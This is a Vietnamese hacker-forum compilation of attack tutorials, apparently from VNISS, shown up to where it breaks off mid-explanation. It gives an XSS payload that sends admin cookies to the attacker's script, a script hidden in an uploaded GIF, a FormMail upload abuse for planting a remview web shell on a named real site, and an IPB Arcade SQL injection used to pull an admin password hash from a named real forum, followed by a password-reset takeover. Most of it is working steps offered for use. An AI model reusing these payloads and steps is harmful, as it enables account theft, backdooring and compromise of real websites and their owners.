Đọc bài về lổi formmail.php trên security.com.vn Jacks FormMail.php Remote File Upload Author: http://www.dtheatre.com/scripts/ Credits: e_D Website: http://penguin-skills.com Một lỗi nằ
Trang 1<BODY>
<img scr="link file ảnh để fake admin tập 2">he</img>
</BODY>
</HTML>
Bước 2 : gửi admin đoạn code sau
Code:
<pre a='>'
onmouseover='document.location="link/giupemdianh.php?helpme="+document.co okie' b='
[img]Link fake admin tập 1[/img]
Chỉ cần admin di chuột qua cái image là toi
Chú ý rõ là HTML phải on nhá, không thì húp cám
Ta còn có thể exploit qua bug mới tôi vừa found sáng này :
Xss Smilies Album 1.1.0 phpBB ( 2.0.x - 2.0.21 )
Cop cái đoạn exploit XSS
Code:
<script>document.location.replace('link?helpme='+document.cookie);</script> vào đầu file image gif
up qua phpBB2/smilies_upload.php
=> smilies_mod/upload/5467caf8d93b8dbadfsdherh24b52511.gif
send cho admin
Bước 3: Chờ đợi admin reply, kiểm tra trên host mình file log sẽ có dạng :
Code:
Xforums_data=a:7:{s:41:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";};
admin=aDFpeGplc2LKctkzOTIuygb1YjI5OTI2LKJkODDCMDhlYzhjM5G6dzN mMDplbmdsnvGV;
user=KctkzOTIuygbtYWdlOjljZGZiNDjhyrGBVDLO896HGb6Nzg2NGM5MTY 3YTE1OjEwOjowOjA6MahbOjo0; lang=english;
eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"xxxxxxxxxxxxxxxxxxxxxxxxxxxx\
";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=dfg788hse643a527bdeafcgh674ng
hash đây xxxxxxxxxxxxxxxxxxxxxxxxxxxx
=> Crack hash hoặc fake cookie
Fake cookie đã có bài roài xem lại nhá
Bài viết trên có phần đóng góp của lão Comp ( lão đóng góp we' j` đâu , lão hỏi
Trang 2có bit chơi cookie vBB k0, em mới tập tọe làm cho cả phpBB ), mong lão đừng chat với em nhá lão chat với em YM! của em die lun
dinhcaohack(vniss)
Hướng dẩn hack lổi Jacks FormMail.php Remote File
Bài viết mang tính tham khảo, được lấy từ Elite Hacking Zone của MATRIX 2K Hacker Association trước đây
Đọc bài về lổi formmail.php trên security.com.vn
Jacks FormMail.php Remote File Upload
Author: http://www.dtheatre.com/scripts/
Credits: e_D
Website: http://penguin-skills.com
Một lỗi nằm trong Jack's Formail ( Script thường được sử dụng ) cho phép Hacker
từ xa có thể upload bất cứ file nào lên bất cứ thư mục nào trong hệ thống
Lỗi được khai thác nằm ở đây
Code:
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<input type="hidden" name="path_to_file" value="/www/uploaded/files">
Đây là một cách tấn công cổ điển nhưng rất hữu dụng , nó là một phần trong kiểu " Input Validation Attacks " Lỗi xảy ra với rất nhiều website Domain
BugSearch - Security.com.vn
Nên coi thử upload như thê nào:
Và upload bằng form thông qua js như sau:
trang test:
http://www.paulmarajewellers.com/order/formmail.php
Trang 3Trích:
The form was not submitted for the following reasons:
I NEED VALID RECIPIENT EMAIL ADDRESS TO CONTINUE
Please use your browser's back button to return to the form and try again
Lợi dung bài viêt của Bugsearch
Code:
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<input type="hidden" name="path_to_file" value="/www/uploaded/files">
Nên dùng js để upload lên site đó như sau:
Code:
javascript:void(document.write("<form action=formmail.php method=post
enctype=multipart/form-data><input type=hidden name=recipient
value=hacker@yahoo.com><input type=hidden name=MAX_FILE_SIZE
value=1000000><input type=hidden name=path_to_file value=./><input type=file name=file><input type=submit></form>"))
kết quả:
Trích:
http://www.paulmarajewellers.com/order/ts.txt
Vâng các bạn có thể up remview lên được rồi đó
Neo(VNISS)
Hướng Dẫn Hack Forum IBF Và Upload Backdoor Lên Hosting
hò!
Vì dạo này bận rộn suốt nên ít quân tâm đến anh em! hôm nay rãnh rỗi tý, nên muốn trao đổi tý kinh nghiệm hack và upload backdoor lên Hosting thông qua việc hack Forum với các anh em! bài viết này cũng mún tặng Necromancer! Smod của Vniss! Và cũng mong rằng Necromancer và các anh em có thêm kinh nghiệm trong hacking!
ok!
Nói về kỹ thuật upload backdoor lên hosting qua việc hack forum trứớc nhưng vì trứớc đây đã từng post bài rồi! do lão NEO backup thế nào mà mất tiêu mấy bài! hic! nên trong khi viết bài thì nói luôn vậy!
Trang 4hò! Mấy hôm trước trungthep và dinhcaohack và dondoc và một số anh em có bàn về lỗi BUG GAME Arcade trong Forum VBB! Rồi ku dondoc dưa cai link bug : http://milw0rm.com/exploits/1296 thấy hay hay! và thấy răng bên VBB thì khó
mà lấy được pass của Admin để Login vào ACP! nên quyết định chọn thằng IBP
để hack ! và chắc là có thể lấy được pass Login của Admin! để rồi có thể upload backdoor lên hosting ! ok
bây giờ nhìn vào phàn Bug xem nào!:
Trích:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from
ibf_members where id=[any_user]
đây là phần Bug ở phần Game Arcade! nó có 2 loại dành cho cả IBP và VBB! ngoài cái Bug này thì phần Arcade này còn dính một số Bug nũă! nhưng mà khó khai thác và có cái ko thể khai thác được!
ok! vậy thì tìm site dính BUG xem nào : vào Google tìm với từ khóa :
Trích:
allinurl:"index.php?act=Arcade"
Có đến hơn 100 nghàn Site dạng kiểu đó ! thoải mái tìm Site để anh em check và hack! hò!
mình chọn http://nubcake.com/index.php?act=Arcade
và link BUG của nó sẽ là: http://nubcake.com/index.php?act=Arc =report&user=1 Test Bug: Thêm dấu ' vào:
báo lỗi :
Trích:
:
mySQL query error: SELECT name FROM ibf_members WHERE id=1'
mySQL error: You have an error in your SQL syntax Check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line
1
Trang 5mySQL error code:
Date: Tuesday 04th of April 2006 01:07:27 PM
SQL inject roài! muốn biết cách khai thác thì các bạn có thể đọc bài viết về tư duy!
kỹ thuật khai thác SQL trong Forum tại đây:
https://www.vniss.net/xforce/showthread.php?t=400
còn ta có link khai thác Pass của admin là là:
http://nubcake.com/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20ibf_members %20where%20id=1
hiện ra:
Trích:
Player Details for 8005125c396680661893d36fc0723158
Pass Hash đấy! bạn có thể FAKE IP để vào forum thành Admin ! OK
nhưng mà bây giờ Trungthep sẽ nói đến phương án khác!vì nếu dừng lại ở đó! thì bạn chỉ có mỗi pass Admin ở dạng PASS HASH đã mã hóa MD5 rồi! Như vậy thì chỉ có thể vào Forum! mà ko thể vào ACP đựoc! vậy bây giờ chúng ta sẽ tìm cách
để có thể có pass admin ở để Login vào ACP!
đầu tiên là bạn tìm xem nick Admin của nó! xem số Id của nó là bâo nhiêu? thông thường là 1! ok! sau đó vào chọn phần quên mật khẩu!
vào: http://nubcake.com/index.php?act=Reg&CODE=10
nhập vào đó tên của admin mà mình muốn lấy Pass! nhập vào : Rob
ok! có trường hợp thì phải nhập Email! mà muốn lấy Email thì dùng luôn câu lệnh Select mà lấy email của admin site đó luôn! dễ thôi mà! ok!
sau đó ! bạn vào quay trở lại link Bug! và sử dụng câu lệnh truy vấn để Select cái Pass mà Server gửi cho admin Rob đó! giải thích về loại pass này thì khi mà mình forgot Pass thì Server sẽ tạo cho Victim 1 cái pass mã hóa (mã hóa theo MD5) và
sẽ gửi link đến mail đã đằng ký cho Victim và khi Run cái đoạn link đó! thì sẽ có
Trang 61 link form hiện ra cho phép mình nhập pass mới vào! mà ko cần nhập vào pass cũ!